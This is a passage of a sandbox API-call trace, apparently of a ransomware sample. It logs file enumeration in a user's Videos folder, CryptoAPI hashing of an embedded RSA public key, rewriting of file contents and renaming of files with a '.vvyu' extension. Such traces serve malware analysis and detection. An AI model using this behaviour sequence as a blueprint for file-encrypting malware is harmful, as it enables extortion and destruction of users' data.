hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0196.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0196.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0196.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea0b0 | out: hHeap=0x2c0000) returned 1 [0196.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.034] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x9615, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9615, lpOverlapped=0x0) returned 1 [0196.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.036] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x961a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.036] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.037] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.038] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.038] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.038] CloseHandle (hObject=0x584) returned 1 [0196.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0196.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.040] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\NMttoz1zVMuEbci.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\nmttoz1zvmuebci.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\NMttoz1zVMuEbci.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\nmttoz1zvmuebci.swf.vvyu")) returned 1 [0196.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.043] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.046] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250bde40, ftCreationTime.dwHighDateTime=0x1d89d57, ftLastAccessTime.dwLowDateTime=0xe8264180, ftLastAccessTime.dwHighDateTime=0x1d8a569, ftLastWriteTime.dwLowDateTime=0xe8264180, ftLastWriteTime.dwHighDateTime=0x1d8a569, nFileSizeHigh=0x0, nFileSizeLow=0x82ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P5dr5.mp4", cAlternateFileName="")) returned 1 [0196.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0196.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0196.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0196.046] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\P5dr5.mp4") returned=".mp4" [0196.046] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\P5dr5.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\p5dr5.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.047] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=33454) returned 1 [0196.047] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.050] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.050] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.060] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.060] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x82ae, lpOverlapped=0x0) returned 1 [0196.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.061] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.061] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.063] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.063] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.063] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.063] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.063] GetLastError () returned 0x0 [0196.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.063] GetLastError () returned 0x0 [0196.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.064] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.064] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.064] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.064] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.064] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82b0) returned 0x2af5168 [0196.065] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea0b0 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea0f8 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0196.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6560 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.070] GetCurrentThreadId () returned 0x5d8 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae89b8 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.070] GetCurrentThreadId () returned 0x5d8 [0196.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0196.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.073] 